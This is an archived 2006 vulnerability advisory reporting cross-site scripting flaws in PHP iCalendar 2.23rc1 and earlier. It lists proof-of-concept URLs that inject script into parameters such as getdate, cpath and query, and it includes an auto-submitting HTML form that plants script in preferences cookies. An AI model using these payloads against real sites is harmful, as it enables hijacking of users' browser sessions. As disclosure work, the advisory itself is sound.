phpicalendar-xss.txt

phpicalendar-xss.txt: Posted Dec 28, 2006; Authored by Lostmon | Site lostmon.blogspot.com; PHP icalendar versions 2.23rc1 and below are susceptible to multiple cross site scripting vulnerabilities.; tags | exploit, php, vulnerability, xss; SHA-256 | 697621b4cd8f230c79e1da41eff9540a3b79265fc5704584705ecaf8bfaea5e2; Download | Favorite | View

phpicalendar-xss.txt

#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisore:http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
#####################################################


PHP icalendar contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.

######################
versions
######################

all of this versions have been tested
Posible other versions are prone vulnerables.

PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1

######################
Solution:
######################

No solution was available at this time!!

##################
Time Line
##################

Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006

###################
EXAMPLES & PoC
###################

http://localhost/phpicalendar/day.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/month.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/year.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/week.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/day.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/month.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/year.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/week.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


----


http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15


http://localhost/phpicalendar/search.php?cpath="><script>alert()</script>&cal=Home
%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12


http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102"><script>alert()</script>&query=ss&submit.x=11&submit.y=12

----

http://localhost/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/print.php?cal=Home,US+Holidays,Work
&getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day

################################
Proof of concept for preferences
################################

Multiple param XSS in preferences.php

Use the proof and modify some params
create a evil cookie before submit :)

http://localhost/phpicalendar/preferences.php?cal=Home,US+Holidays,Work
&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E


<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>

cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script>
document.forms[0].submit()
</script>
</textarea>
</body>
</html>


######################## €nd #####################

Thnx to Estrella to be my ligth.

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

phpicalendar-xss.txt

phpicalendar-xss.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpicalendar-xss.txt

Share This

phpicalendar-xss.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems